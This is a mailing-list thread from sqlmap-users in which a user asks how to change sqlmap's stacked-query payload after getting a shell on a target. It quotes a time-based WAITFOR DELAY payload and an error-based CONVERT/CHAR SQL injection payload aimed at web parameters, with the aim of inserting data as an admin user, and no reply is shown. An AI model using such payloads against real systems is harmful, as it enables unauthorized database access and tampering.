Re: [sqlmap-users] Change Payload ,Insert problem

Sun, 08 Feb 2015 15:25:54 -0800 

Maybe my question isn't clear , let me try again :

I need to change stack query to not using timebase detection ?


Sqlmap detect injection there by error base type too, like this :


Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT
CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN
(9622=9622) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV

How can i have this payload with type of stack query

Regards

On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <dehqa...@gmail.com> wrote:

> Guys is there any chance ?
>
> Thanks in advance
>
> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <dehqa...@gmail.com> wrote:
>
>> I mean how may i have custom payload :
>>
>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT
>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN
>> (9622=9622) THEN CHAR(49) ELSE CHAR(48)
>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>
>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <dehqa...@gmail.com> wrote:
>>
>>> Hi
>>>
>>> sqlmap gave me shell with injection type of stack queries ,but
>>> Payload is like this :
>>>
>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>>
>>> When i want insert with admin user sqlmap returns NULL and fails ,
>>> Only says this before trying :
>>>
>>> [WARNING] time-based comparison requires larger statistical model,
>>> please wait..............................
>>>
>>> Maybe i should change Payload , with what switch i can change payload ?
>>>
>>>
>>> Regards
>>>
>>
>>
>

------------------------------------------------------------------------------
Dive into the World of Parallel Programming. The Go Parallel Website,
sponsored by Intel and developed in partnership with Slashdot Media, is your
hub for all things parallel software development, from weekly thought
leadership blogs to news, videos, case studies, tutorials and more. Take a
look and join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to